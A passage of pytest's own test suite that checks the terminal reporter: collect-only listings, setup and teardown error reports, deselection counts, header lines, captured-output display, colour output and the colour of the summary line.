def test_method(self):
pass
"""
)
result = pytester.runpytest("--collect-only", p)
# assert stderr.startswith("inserting into sys.path")
assert result.ret == 0
result.stdout.fnmatch_lines(
[
"*<Module *.py>",
"* <Function test_func1>",
"* <Class TestClass>",
"* <Function test_method>",
]
)
def test_collectonly_error(self, pytester: Pytester) -> None:
p = pytester.makepyfile("import Errlkjqweqwe")
result = pytester.runpytest("--collect-only", p)
assert result.ret == 2
result.stdout.fnmatch_lines(
textwrap.dedent(
"""\
*ERROR*
*ImportError*
*No module named *Errlk*
*1 error*
"""
).strip()
)
def test_collectonly_missing_path(self, pytester: Pytester) -> None:
"""Issue 115: failure in parseargs will cause session not to
have the items attribute."""
result = pytester.runpytest("--collect-only", "uhm_missing_path")
assert result.ret == 4
result.stderr.fnmatch_lines(
["*ERROR: file or directory not found: uhm_missing_path"]
)
def test_collectonly_quiet(self, pytester: Pytester) -> None:
pytester.makepyfile("def test_foo(): pass")
result = pytester.runpytest("--collect-only", "-q")
result.stdout.fnmatch_lines(["*test_foo*"])
def test_collectonly_more_quiet(self, pytester: Pytester) -> None:
pytester.makepyfile(test_fun="def test_foo(): pass")
result = pytester.runpytest("--collect-only", "-qq")
result.stdout.fnmatch_lines(["*test_fun.py: 1*"])
def test_collect_only_summary_status(self, pytester: Pytester) -> None:
"""Custom status depending on test selection using -k or -m. #7701."""
pytester.makepyfile(
test_collect_foo="""
def test_foo(): pass
""",
test_collect_bar="""
def test_foobar(): pass
def test_bar(): pass
""",
)
result = pytester.runpytest("--collect-only")
result.stdout.fnmatch_lines("*== 3 tests collected in * ==*")
result = pytester.runpytest("--collect-only", "test_collect_foo.py")
result.stdout.fnmatch_lines("*== 1 test collected in * ==*")
result = pytester.runpytest("--collect-only", "-k", "foo")
result.stdout.fnmatch_lines("*== 2/3 tests collected (1 deselected) in * ==*")
result = pytester.runpytest("--collect-only", "-k", "test_bar")
result.stdout.fnmatch_lines("*== 1/3 tests collected (2 deselected) in * ==*")
result = pytester.runpytest("--collect-only", "-k", "invalid")
result.stdout.fnmatch_lines("*== no tests collected (3 deselected) in * ==*")
pytester.mkdir("no_tests_here")
result = pytester.runpytest("--collect-only", "no_tests_here")
result.stdout.fnmatch_lines("*== no tests collected in * ==*")
pytester.makepyfile(
test_contains_error="""
raise RuntimeError
""",
)
result = pytester.runpytest("--collect-only")
result.stdout.fnmatch_lines("*== 3 tests collected, 1 error in * ==*")
result = pytester.runpytest("--collect-only", "-k", "foo")
result.stdout.fnmatch_lines(
"*== 2/3 tests collected (1 deselected), 1 error in * ==*"
)
class TestFixtureReporting:
def test_setup_fixture_error(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
def setup_function(function):
print("setup func")
assert 0
def test_nada():
pass
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(
[
"*ERROR at setup of test_nada*",
"*setup_function(function):*",
"*setup func*",
"*assert 0*",
"*1 error*",
]
)
assert result.ret != 0
def test_teardown_fixture_error(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
def test_nada():
pass
def teardown_function(function):
print("teardown func")
assert 0
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(
[
"*ERROR at teardown*",
"*teardown_function(function):*",
"*assert 0*",
"*Captured stdout*",
"*teardown func*",
"*1 passed*1 error*",
]
)
def test_teardown_fixture_error_and_test_failure(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
def test_fail():
assert 0, "failingfunc"
def teardown_function(function):
print("teardown func")
assert False
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(
[
"*ERROR at teardown of test_fail*",
"*teardown_function(function):*",
"*assert False*",
"*Captured stdout*",
"*teardown func*",
"*test_fail*",
"*def test_fail():",
"*failingfunc*",
"*1 failed*1 error*",
]
)
def test_setup_teardown_output_and_test_failure(self, pytester: Pytester) -> None:
"""Test for issue #442."""
pytester.makepyfile(
"""
def setup_function(function):
print("setup func")
def test_fail():
assert 0, "failingfunc"
def teardown_function(function):
print("teardown func")
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(
[
"*test_fail*",
"*def test_fail():",
"*failingfunc*",
"*Captured stdout setup*",
"*setup func*",
"*Captured stdout teardown*",
"*teardown func*",
"*1 failed*",
]
)
class TestTerminalFunctional:
def test_deselected(self, pytester: Pytester) -> None:
testpath = pytester.makepyfile(
"""
def test_one():
pass
def test_two():
pass
def test_three():
pass
"""
)
result = pytester.runpytest("-k", "test_t", testpath)
result.stdout.fnmatch_lines(
["collected 3 items / 1 deselected / 2 selected", "*test_deselected.py ..*"]
)
assert result.ret == 0
def test_deselected_with_hookwrapper(self, pytester: Pytester) -> None:
pytester.makeconftest(
"""
import pytest
@pytest.hookimpl(hookwrapper=True)
def pytest_collection_modifyitems(config, items):
yield
deselected = items.pop()
config.hook.pytest_deselected(items=[deselected])
"""
)
testpath = pytester.makepyfile(
"""
def test_one():
pass
def test_two():
pass
def test_three():
pass
"""
)
result = pytester.runpytest(testpath)
result.stdout.fnmatch_lines(
[
"collected 3 items / 1 deselected / 2 selected",
"*= 2 passed, 1 deselected in*",
]
)
assert result.ret == 0
def test_show_deselected_items_using_markexpr_before_test_execution(
self, pytester: Pytester
) -> None:
pytester.makepyfile(
test_show_deselected="""
import pytest
@pytest.mark.foo
def test_foobar():
pass
@pytest.mark.bar
def test_bar():
pass
def test_pass():
pass
"""
)
result = pytester.runpytest("-m", "not foo")
result.stdout.fnmatch_lines(
[
"collected 3 items / 1 deselected / 2 selected",
"*test_show_deselected.py ..*",
"*= 2 passed, 1 deselected in * =*",
]
)
result.stdout.no_fnmatch_line("*= 1 deselected =*")
assert result.ret == 0
def test_selected_count_with_error(self, pytester: Pytester) -> None:
pytester.makepyfile(
test_selected_count_3="""
def test_one():
pass
def test_two():
pass
def test_three():
pass
""",
test_selected_count_error="""
5/0
def test_foo():
pass
def test_bar():
pass
""",
)
result = pytester.runpytest("-k", "test_t")
result.stdout.fnmatch_lines(
[
"collected 3 items / 1 error / 1 deselected / 2 selected",
"* ERROR collecting test_selected_count_error.py *",
]
)
assert result.ret == ExitCode.INTERRUPTED
def test_no_skip_summary_if_failure(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
import pytest
def test_ok():
pass
def test_fail():
assert 0
def test_skip():
pytest.skip("dontshow")
"""
)
result = pytester.runpytest()
assert result.stdout.str().find("skip test summary") == -1
assert result.ret == 1
def test_passes(self, pytester: Pytester) -> None:
p1 = pytester.makepyfile(
"""
def test_passes():
pass
class TestClass(object):
def test_method(self):
pass
"""
)
old = p1.parent
pytester.chdir()
try:
result = pytester.runpytest()
finally:
os.chdir(old)
result.stdout.fnmatch_lines(["test_passes.py ..*", "* 2 pass*"])
assert result.ret == 0
def test_header_trailer_info(
self, monkeypatch: MonkeyPatch, pytester: Pytester, request
) -> None:
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD")
pytester.makepyfile(
"""
def test_passes():
pass
"""
)
result = pytester.runpytest()
verinfo = ".".join(map(str, sys.version_info[:3]))
result.stdout.fnmatch_lines(
[
"*===== test session starts ====*",
"platform %s -- Python %s*pytest-%s**pluggy-%s"
% (
sys.platform,
verinfo,
pytest.__version__,
pluggy.__version__,
),
"*test_header_trailer_info.py .*",
"=* 1 passed*in *.[0-9][0-9]s *=",
]
)
if request.config.pluginmanager.list_plugin_distinfo():
result.stdout.fnmatch_lines(["plugins: *"])
def test_no_header_trailer_info(
self, monkeypatch: MonkeyPatch, pytester: Pytester, request
) -> None:
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD")
pytester.makepyfile(
"""
def test_passes():
pass
"""
)
result = pytester.runpytest("--no-header")
verinfo = ".".join(map(str, sys.version_info[:3]))
result.stdout.no_fnmatch_line(
"platform %s -- Python %s*pytest-%s**pluggy-%s"
% (
sys.platform,
verinfo,
pytest.__version__,
pluggy.__version__,
)
)
if request.config.pluginmanager.list_plugin_distinfo():
result.stdout.no_fnmatch_line("plugins: *")
def test_header(self, pytester: Pytester) -> None:
pytester.path.joinpath("tests").mkdir()
pytester.path.joinpath("gui").mkdir()
# no ini file
result = pytester.runpytest()
result.stdout.fnmatch_lines(["rootdir: *test_header0"])
# with configfile
pytester.makeini("""[pytest]""")
result = pytester.runpytest()
result.stdout.fnmatch_lines(["rootdir: *test_header0, configfile: tox.ini"])
# with testpaths option, and not passing anything in the command-line
pytester.makeini(
"""
[pytest]
testpaths = tests gui
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(
["rootdir: *test_header0, configfile: tox.ini, testpaths: tests, gui"]
)
# with testpaths option, passing directory in command-line: do not show testpaths then
result = pytester.runpytest("tests")
result.stdout.fnmatch_lines(["rootdir: *test_header0, configfile: tox.ini"])
def test_header_absolute_testpath(
self, pytester: Pytester, monkeypatch: MonkeyPatch
) -> None:
"""Regresstion test for #7814."""
tests = pytester.path.joinpath("tests")
tests.mkdir()
pytester.makepyprojecttoml(
"""
[tool.pytest.ini_options]
testpaths = ['{}']
""".format(
tests
)
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(
[
"rootdir: *absolute_testpath0, configfile: pyproject.toml, testpaths: {}".format(
tests
)
]
)
def test_no_header(self, pytester: Pytester) -> None:
pytester.path.joinpath("tests").mkdir()
pytester.path.joinpath("gui").mkdir()
# with testpaths option, and not passing anything in the command-line
pytester.makeini(
"""
[pytest]
testpaths = tests gui
"""
)
result = pytester.runpytest("--no-header")
result.stdout.no_fnmatch_line(
"rootdir: *test_header0, inifile: tox.ini, testpaths: tests, gui"
)
# with testpaths option, passing directory in command-line: do not show testpaths then
result = pytester.runpytest("tests", "--no-header")
result.stdout.no_fnmatch_line("rootdir: *test_header0, inifile: tox.ini")
def test_no_summary(self, pytester: Pytester) -> None:
p1 = pytester.makepyfile(
"""
def test_no_summary():
assert false
"""
)
result = pytester.runpytest(p1, "--no-summary")
result.stdout.no_fnmatch_line("*= FAILURES =*")
def test_showlocals(self, pytester: Pytester) -> None:
p1 = pytester.makepyfile(
"""
def test_showlocals():
x = 3
y = "x" * 5000
assert 0
"""
)
result = pytester.runpytest(p1, "-l")
result.stdout.fnmatch_lines(
[
# "_ _ * Locals *",
"x* = 3",
"y* = 'xxxxxx*",
]
)
def test_showlocals_short(self, pytester: Pytester) -> None:
p1 = pytester.makepyfile(
"""
def test_showlocals_short():
x = 3
y = "xxxx"
assert 0
"""
)
result = pytester.runpytest(p1, "-l", "--tb=short")
result.stdout.fnmatch_lines(
[
"test_showlocals_short.py:*",
" assert 0",
"E assert 0",
" x = 3",
" y = 'xxxx'",
]
)
@pytest.fixture
def verbose_testfile(self, pytester: Pytester) -> Path:
return pytester.makepyfile(
"""
import pytest
def test_fail():
raise ValueError()
def test_pass():
pass
class TestClass(object):
def test_skip(self):
pytest.skip("hello")
def test_gen():
def check(x):
assert x == 1
yield check, 0
"""
)
def test_verbose_reporting(self, verbose_testfile, pytester: Pytester) -> None:
result = pytester.runpytest(
verbose_testfile, "-v", "-Walways::pytest.PytestWarning"
)
result.stdout.fnmatch_lines(
[
"*test_verbose_reporting.py::test_fail *FAIL*",
"*test_verbose_reporting.py::test_pass *PASS*",
"*test_verbose_reporting.py::TestClass::test_skip *SKIP*",
"*test_verbose_reporting.py::test_gen *XFAIL*",
]
)
assert result.ret == 1
def test_verbose_reporting_xdist(
self,
verbose_testfile,
monkeypatch: MonkeyPatch,
pytester: Pytester,
pytestconfig,
) -> None:
if not pytestconfig.pluginmanager.get_plugin("xdist"):
pytest.skip("xdist plugin not installed")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD")
result = pytester.runpytest(
verbose_testfile, "-v", "-n 1", "-Walways::pytest.PytestWarning"
)
result.stdout.fnmatch_lines(
["*FAIL*test_verbose_reporting_xdist.py::test_fail*"]
)
assert result.ret == 1
def test_quiet_reporting(self, pytester: Pytester) -> None:
p1 = pytester.makepyfile("def test_pass(): pass")
result = pytester.runpytest(p1, "-q")
s = result.stdout.str()
assert "test session starts" not in s
assert p1.name not in s
assert "===" not in s
assert "passed" in s
def test_more_quiet_reporting(self, pytester: Pytester) -> None:
p1 = pytester.makepyfile("def test_pass(): pass")
result = pytester.runpytest(p1, "-qq")
s = result.stdout.str()
assert "test session starts" not in s
assert p1.name not in s
assert "===" not in s
assert "passed" not in s
@pytest.mark.parametrize(
"params", [(), ("--collect-only",)], ids=["no-params", "collect-only"]
)
def test_report_collectionfinish_hook(self, pytester: Pytester, params) -> None:
pytester.makeconftest(
"""
def pytest_report_collectionfinish(config, start_path, items):
return [f'hello from hook: {len(items)} items']
"""
)
pytester.makepyfile(
"""
import pytest
@pytest.mark.parametrize('i', range(3))
def test(i):
pass
"""
)
result = pytester.runpytest(*params)
result.stdout.fnmatch_lines(["collected 3 items", "hello from hook: 3 items"])
def test_summary_f_alias(self, pytester: Pytester) -> None:
"""Test that 'f' and 'F' report chars are aliases and don't show up twice in the summary (#6334)"""
pytester.makepyfile(
"""
def test():
assert False
"""
)
result = pytester.runpytest("-rfF")
expected = "FAILED test_summary_f_alias.py::test - assert False"
result.stdout.fnmatch_lines([expected])
assert result.stdout.lines.count(expected) == 1
def test_summary_s_alias(self, pytester: Pytester) -> None:
"""Test that 's' and 'S' report chars are aliases and don't show up twice in the summary"""
pytester.makepyfile(
"""
import pytest
@pytest.mark.skip
def test():
pass
"""
)
result = pytester.runpytest("-rsS")
expected = "SKIPPED [1] test_summary_s_alias.py:3: unconditional skip"
result.stdout.fnmatch_lines([expected])
assert result.stdout.lines.count(expected) == 1
def test_fail_extra_reporting(pytester: Pytester, monkeypatch) -> None:
monkeypatch.setenv("COLUMNS", "80")
pytester.makepyfile("def test_this(): assert 0, 'this_failed' * 100")
result = pytester.runpytest("-rN")
result.stdout.no_fnmatch_line("*short test summary*")
result = pytester.runpytest()
result.stdout.fnmatch_lines(
[
"*test summary*",
"FAILED test_fail_extra_reporting.py::test_this - AssertionError: this_failedt...",
]
)
def test_fail_reporting_on_pass(pytester: Pytester) -> None:
pytester.makepyfile("def test_this(): assert 1")
result = pytester.runpytest("-rf")
result.stdout.no_fnmatch_line("*short test summary*")
def test_pass_extra_reporting(pytester: Pytester) -> None:
pytester.makepyfile("def test_this(): assert 1")
result = pytester.runpytest()
result.stdout.no_fnmatch_line("*short test summary*")
result = pytester.runpytest("-rp")
result.stdout.fnmatch_lines(["*test summary*", "PASS*test_pass_extra_reporting*"])
def test_pass_reporting_on_fail(pytester: Pytester) -> None:
pytester.makepyfile("def test_this(): assert 0")
result = pytester.runpytest("-rp")
result.stdout.no_fnmatch_line("*short test summary*")
def test_pass_output_reporting(pytester: Pytester) -> None:
pytester.makepyfile(
"""
def setup_module():
print("setup_module")
def teardown_module():
print("teardown_module")
def test_pass_has_output():
print("Four score and seven years ago...")
def test_pass_no_output():
pass
"""
)
result = pytester.runpytest()
s = result.stdout.str()
assert "test_pass_has_output" not in s
assert "Four score and seven years ago..." not in s
assert "test_pass_no_output" not in s
result = pytester.runpytest("-rPp")
result.stdout.fnmatch_lines(
[
"*= PASSES =*",
"*_ test_pass_has_output _*",
"*- Captured stdout setup -*",
"setup_module",
"*- Captured stdout call -*",
"Four score and seven years ago...",
"*- Captured stdout teardown -*",
"teardown_module",
"*= short test summary info =*",
"PASSED test_pass_output_reporting.py::test_pass_has_output",
"PASSED test_pass_output_reporting.py::test_pass_no_output",
"*= 2 passed in *",
]
)
def test_color_yes(pytester: Pytester, color_mapping) -> None:
p1 = pytester.makepyfile(
"""
def fail():
assert 0
def test_this():
fail()
"""
)
result = pytester.runpytest("--color=yes", str(p1))
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
"{bold}=*= test session starts =*={reset}",
"collected 1 item",
"",
"test_color_yes.py {red}F{reset}{red} * [100%]{reset}",
"",
"=*= FAILURES =*=",
"{red}{bold}_*_ test_this _*_{reset}",
"",
" {kw}def{hl-reset} {function}test_this{hl-reset}():",
"> fail()",
"",
"{bold}{red}test_color_yes.py{reset}:5: ",
"_ _ * _ _*",
"",
" {kw}def{hl-reset} {function}fail{hl-reset}():",
"> {kw}assert{hl-reset} {number}0{hl-reset}",
"{bold}{red}E assert 0{reset}",
"",
"{bold}{red}test_color_yes.py{reset}:2: AssertionError",
"{red}=*= {red}{bold}1 failed{reset}{red} in *s{reset}{red} =*={reset}",
]
)
)
result = pytester.runpytest("--color=yes", "--tb=short", str(p1))
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
"{bold}=*= test session starts =*={reset}",
"collected 1 item",
"",
"test_color_yes.py {red}F{reset}{red} * [100%]{reset}",
"",
"=*= FAILURES =*=",
"{red}{bold}_*_ test_this _*_{reset}",
"{bold}{red}test_color_yes.py{reset}:5: in test_this",
" fail()",
"{bold}{red}test_color_yes.py{reset}:2: in fail",
" {kw}assert{hl-reset} {number}0{hl-reset}",
"{bold}{red}E assert 0{reset}",
"{red}=*= {red}{bold}1 failed{reset}{red} in *s{reset}{red} =*={reset}",
]
)
)
def test_color_no(pytester: Pytester) -> None:
pytester.makepyfile("def test_this(): assert 1")
result = pytester.runpytest("--color=no")
assert "test session starts" in result.stdout.str()
result.stdout.no_fnmatch_line("*\x1b[1m*")
@pytest.mark.parametrize("verbose", [True, False])
def test_color_yes_collection_on_non_atty(pytester: Pytester, verbose) -> None:
"""#1397: Skip collect progress report when working on non-terminals."""
pytester.makepyfile(
"""
import pytest
@pytest.mark.parametrize('i', range(10))
def test_this(i):
assert 1
"""
)
args = ["--color=yes"]
if verbose:
args.append("-vv")
result = pytester.runpytest(*args)
assert "test session starts" in result.stdout.str()
assert "\x1b[1m" in result.stdout.str()
result.stdout.no_fnmatch_line("*collecting 10 items*")
if verbose:
assert "collecting ..." in result.stdout.str()
assert "collected 10 items" in result.stdout.str()
def test_getreportopt() -> None:
from _pytest.terminal import _REPORTCHARS_DEFAULT
class FakeConfig:
class Option:
reportchars = _REPORTCHARS_DEFAULT
disable_warnings = False
option = Option()
config = cast(Config, FakeConfig())
assert _REPORTCHARS_DEFAULT == "fE"
# Default.
assert getreportopt(config) == "wfE"
config.option.reportchars = "sf"
assert getreportopt(config) == "wsf"
config.option.reportchars = "sfxw"
assert getreportopt(config) == "sfxw"
config.option.reportchars = "a"
assert getreportopt(config) == "wsxXEf"
config.option.reportchars = "N"
assert getreportopt(config) == "w"
config.option.reportchars = "NwfE"
assert getreportopt(config) == "wfE"
config.option.reportchars = "NfENx"
assert getreportopt(config) == "wx"
# Now with --disable-warnings.
config.option.disable_warnings = True
config.option.reportchars = "a"
assert getreportopt(config) == "sxXEf"
config.option.reportchars = "sfx"
assert getreportopt(config) == "sfx"
config.option.reportchars = "sfxw"
assert getreportopt(config) == "sfx"
config.option.reportchars = "a"
assert getreportopt(config) == "sxXEf"
config.option.reportchars = "A"
assert getreportopt(config) == "PpsxXEf"
config.option.reportchars = "AN"
assert getreportopt(config) == ""
config.option.reportchars = "NwfE"
assert getreportopt(config) == "fE"
def test_terminalreporter_reportopt_addopts(pytester: Pytester) -> None:
pytester.makeini("[pytest]\naddopts=-rs")
pytester.makepyfile(
"""
import pytest
@pytest.fixture
def tr(request):
tr = request.config.pluginmanager.getplugin("terminalreporter")
return tr
def test_opt(tr):
assert tr.hasopt('skipped')
assert not tr.hasopt('qwe')
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(["*1 passed*"])
def test_tbstyle_short(pytester: Pytester) -> None:
p = pytester.makepyfile(
"""
import pytest
@pytest.fixture
def arg(request):
return 42
def test_opt(arg):
x = 0
assert x
"""
)
result = pytester.runpytest("--tb=short")
s = result.stdout.str()
assert "arg = 42" not in s
assert "x = 0" not in s
result.stdout.fnmatch_lines(["*%s:8*" % p.name, " assert x", "E assert*"])
result = pytester.runpytest()
s = result.stdout.str()
assert "x = 0" in s
assert "assert x" in s
def test_traceconfig(pytester: Pytester) -> None:
result = pytester.runpytest("--traceconfig")
result.stdout.fnmatch_lines(["*active plugins*"])
assert result.ret == ExitCode.NO_TESTS_COLLECTED
class TestGenericReporting:
"""Test class which can be subclassed with a different option provider to
run e.g. distributed tests."""
def test_collect_fail(self, pytester: Pytester, option) -> None:
pytester.makepyfile("import xyz\n")
result = pytester.runpytest(*option.args)
result.stdout.fnmatch_lines(
["ImportError while importing*", "*No module named *xyz*", "*1 error*"]
)
def test_maxfailures(self, pytester: Pytester, option) -> None:
pytester.makepyfile(
"""
def test_1():
assert 0
def test_2():
assert 0
def test_3():
assert 0
"""
)
result = pytester.runpytest("--maxfail=2", *option.args)
result.stdout.fnmatch_lines(
[
"*def test_1():*",
"*def test_2():*",
"*! stopping after 2 failures !*",
"*2 failed*",
]
)
def test_maxfailures_with_interrupted(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
def test(request):
request.session.shouldstop = "session_interrupted"
assert 0
"""
)
result = pytester.runpytest("--maxfail=1", "-ra")
result.stdout.fnmatch_lines(
[
"*= short test summary info =*",
"FAILED *",
"*! stopping after 1 failures !*",
"*! session_interrupted !*",
"*= 1 failed in*",
]
)
def test_tb_option(self, pytester: Pytester, option) -> None:
pytester.makepyfile(
"""
import pytest
def g():
raise IndexError
def test_func():
print(6*7)
g() # --calling--
"""
)
for tbopt in ["long", "short", "no"]:
print("testing --tb=%s..." % tbopt)
result = pytester.runpytest("-rN", "--tb=%s" % tbopt)
s = result.stdout.str()
if tbopt == "long":
assert "print(6*7)" in s
else:
assert "print(6*7)" not in s
if tbopt != "no":
assert "--calling--" in s
assert "IndexError" in s
else:
assert "FAILURES" not in s
assert "--calling--" not in s
assert "IndexError" not in s
def test_tb_crashline(self, pytester: Pytester, option) -> None:
p = pytester.makepyfile(
"""
import pytest
def g():
raise IndexError
def test_func1():
print(6*7)
g() # --calling--
def test_func2():
assert 0, "hello"
"""
)
result = pytester.runpytest("--tb=line")
bn = p.name
result.stdout.fnmatch_lines(
["*%s:3: IndexError*" % bn, "*%s:8: AssertionError: hello*" % bn]
)
s = result.stdout.str()
assert "def test_func2" not in s
def test_pytest_report_header(self, pytester: Pytester, option) -> None:
pytester.makeconftest(
"""
def pytest_sessionstart(session):
session.config._somevalue = 42
def pytest_report_header(config):
return "hello: %s" % config._somevalue
"""
)
pytester.mkdir("a").joinpath("conftest.py").write_text(
"""
def pytest_report_header(config, start_path):
return ["line1", str(start_path)]
"""
)
result = pytester.runpytest("a")
result.stdout.fnmatch_lines(["*hello: 42*", "line1", str(pytester.path)])
def test_show_capture(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
import sys
import logging
def test_one():
sys.stdout.write('!This is stdout!')
sys.stderr.write('!This is stderr!')
logging.warning('!This is a warning log msg!')
assert False, 'Something failed'
"""
)
result = pytester.runpytest("--tb=short")
result.stdout.fnmatch_lines(
[
"!This is stdout!",
"!This is stderr!",
"*WARNING*!This is a warning log msg!",
]
)
result = pytester.runpytest("--show-capture=all", "--tb=short")
result.stdout.fnmatch_lines(
[
"!This is stdout!",
"!This is stderr!",
"*WARNING*!This is a warning log msg!",
]
)
stdout = pytester.runpytest("--show-capture=stdout", "--tb=short").stdout.str()
assert "!This is stderr!" not in stdout
assert "!This is stdout!" in stdout
assert "!This is a warning log msg!" not in stdout
stdout = pytester.runpytest("--show-capture=stderr", "--tb=short").stdout.str()
assert "!This is stdout!" not in stdout
assert "!This is stderr!" in stdout
assert "!This is a warning log msg!" not in stdout
stdout = pytester.runpytest("--show-capture=log", "--tb=short").stdout.str()
assert "!This is stdout!" not in stdout
assert "!This is stderr!" not in stdout
assert "!This is a warning log msg!" in stdout
stdout = pytester.runpytest("--show-capture=no", "--tb=short").stdout.str()
assert "!This is stdout!" not in stdout
assert "!This is stderr!" not in stdout
assert "!This is a warning log msg!" not in stdout
def test_show_capture_with_teardown_logs(self, pytester: Pytester) -> None:
"""Ensure that the capturing of teardown logs honor --show-capture setting"""
pytester.makepyfile(
"""
import logging
import sys
import pytest
@pytest.fixture(scope="function", autouse="True")
def hook_each_test(request):
yield
sys.stdout.write("!stdout!")
sys.stderr.write("!stderr!")
logging.warning("!log!")
def test_func():
assert False
"""
)
result = pytester.runpytest("--show-capture=stdout", "--tb=short").stdout.str()
assert "!stdout!" in result
assert "!stderr!" not in result
assert "!log!" not in result
result = pytester.runpytest("--show-capture=stderr", "--tb=short").stdout.str()
assert "!stdout!" not in result
assert "!stderr!" in result
assert "!log!" not in result
result = pytester.runpytest("--show-capture=log", "--tb=short").stdout.str()
assert "!stdout!" not in result
assert "!stderr!" not in result
assert "!log!" in result
result = pytester.runpytest("--show-capture=no", "--tb=short").stdout.str()
assert "!stdout!" not in result
assert "!stderr!" not in result
assert "!log!" not in result
@pytest.mark.xfail("not hasattr(os, 'dup')")
def test_fdopen_kept_alive_issue124(pytester: Pytester) -> None:
pytester.makepyfile(
"""
import os, sys
k = []
def test_open_file_and_keep_alive(capfd):
stdout = os.fdopen(1, 'w', 1)
k.append(stdout)
def test_close_kept_alive_file():
stdout = k.pop()
stdout.close()
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(["*2 passed*"])
def test_tbstyle_native_setup_error(pytester: Pytester) -> None:
pytester.makepyfile(
"""
import pytest
@pytest.fixture
def setup_error_fixture():
raise Exception("error in exception")
def test_error_fixture(setup_error_fixture):
pass
"""
)
result = pytester.runpytest("--tb=native")
result.stdout.fnmatch_lines(
['*File *test_tbstyle_native_setup_error.py", line *, in setup_error_fixture*']
)
def test_terminal_summary(pytester: Pytester) -> None:
pytester.makeconftest(
"""
def pytest_terminal_summary(terminalreporter, exitstatus):
w = terminalreporter
w.section("hello")
w.line("world")
w.line("exitstatus: {0}".format(exitstatus))
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(
"""
*==== hello ====*
world
exitstatus: 5
"""
)
@pytest.mark.filterwarnings("default::UserWarning")
def test_terminal_summary_warnings_are_displayed(pytester: Pytester) -> None:
"""Test that warnings emitted during pytest_terminal_summary are displayed.
(#1305).
"""
pytester.makeconftest(
"""
import warnings
def pytest_terminal_summary(terminalreporter):
warnings.warn(UserWarning('internal warning'))
"""
)
pytester.makepyfile(
"""
def test_failure():
import warnings
warnings.warn("warning_from_" + "test")
assert 0
"""
)
result = pytester.runpytest("-ra")
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"*warning_from_test*",
"*= short test summary info =*",
"*= warnings summary (final) =*",
"*conftest.py:3:*internal warning",
"*== 1 failed, 2 warnings in *",
]
)
result.stdout.no_fnmatch_line("*None*")
stdout = result.stdout.str()
assert stdout.count("warning_from_test") == 1
assert stdout.count("=== warnings summary ") == 2
@pytest.mark.filterwarnings("default::UserWarning")
def test_terminal_summary_warnings_header_once(pytester: Pytester) -> None:
pytester.makepyfile(
"""
def test_failure():
import warnings
warnings.warn("warning_from_" + "test")
assert 0
"""
)
result = pytester.runpytest("-ra")
result.stdout.fnmatch_lines(
[
"*= warnings summary =*",
"*warning_from_test*",
"*= short test summary info =*",
"*== 1 failed, 1 warning in *",
]
)
result.stdout.no_fnmatch_line("*None*")
stdout = result.stdout.str()
assert stdout.count("warning_from_test") == 1
assert stdout.count("=== warnings summary ") == 1
@pytest.mark.filterwarnings("default")
def test_terminal_no_summary_warnings_header_once(pytester: Pytester) -> None:
pytester.makepyfile(
"""
def test_failure():
import warnings
warnings.warn("warning_from_" + "test")
assert 0
"""
)
result = pytester.runpytest("--no-summary")
result.stdout.no_fnmatch_line("*= warnings summary =*")
result.stdout.no_fnmatch_line("*= short test summary info =*")
@pytest.fixture(scope="session")
def tr() -> TerminalReporter:
config = _pytest.config._prepareconfig()
return TerminalReporter(config)
@pytest.mark.parametrize(
"exp_color, exp_line, stats_arg",
[
# The method under test only cares about the length of each
# dict value, not the actual contents, so tuples of anything
# suffice
# Important statuses -- the highest priority of these always wins
("red", [("1 failed", {"bold": True, "red": True})], {"failed": [1]}),
(
"red",
[
("1 failed", {"bold": True, "red": True}),
("1 passed", {"bold": False, "green": True}),
],
{"failed": [1], "passed": [1]},
),
("red", [("1 error", {"bold": True, "red": True})], {"error": [1]}),
("red", [("2 errors", {"bold": True, "red": True})], {"error": [1, 2]}),
(
"red",
[
("1 passed", {"bold": False, "green": True}),
("1 error", {"bold": True, "red": True}),
],
{"error": [1], "passed": [1]},
),
# (a status that's not known to the code)
("yellow", [("1 weird", {"bold": True, "yellow": True})], {"weird": [1]}),
(
"yellow",
[
("1 passed", {"bold": False, "green": True}),
("1 weird", {"bold": True, "yellow": True}),
],
{"weird": [1], "passed": [1]},
),
("yellow", [("1 warning", {"bold": True, "yellow": True})], {"warnings": [1]}),
(
"yellow",
[
("1 passed", {"bold": False, "green": True}),
("1 warning", {"bold": True, "yellow": True}),
],
{"warnings": [1], "passed": [1]},
),
(
"green",
[("5 passed", {"bold": True, "green": True})],
{"passed": [1, 2, 3, 4, 5]},
),
# "Boring" statuses. These have no effect on the color of the summary
# line. Thus, if *every* test has a boring status, the summary line stays
# at its default color, i.e. yellow, to warn the user that the test run
# produced no useful information
("yellow", [("1 skipped", {"bold": True, "yellow": True})], {"skipped": [1]}),
(
"green",
[
("1 passed", {"bold": True, "green": True}),
("1 skipped", {"bold": False, "yellow": True}),
],
{"skipped": [1], "passed": [1]},
),
(
"yellow",
[("1 deselected", {"bold": True, "yellow": True})],
{"deselected": [1]},
),
(
"green",
[
("1 passed", {"bold": True, "green": True}),
("1 deselected", {"bold": False, "yellow": True}),
],
{"deselected": [1], "passed": [1]},
),
("yellow", [("1 xfailed", {"bold": True, "yellow": True})], {"xfailed": [1]}),
(
"green",
[
("1 passed", {"bold": True, "green": True}),
("1 xfailed", {"bold": False, "yellow": True}),
],
{"xfailed": [1], "passed": [1]},
),
("yellow", [("1 xpassed", {"bold": True, "yellow": True})], {"xpassed": [1]}),
(
"yellow",
[
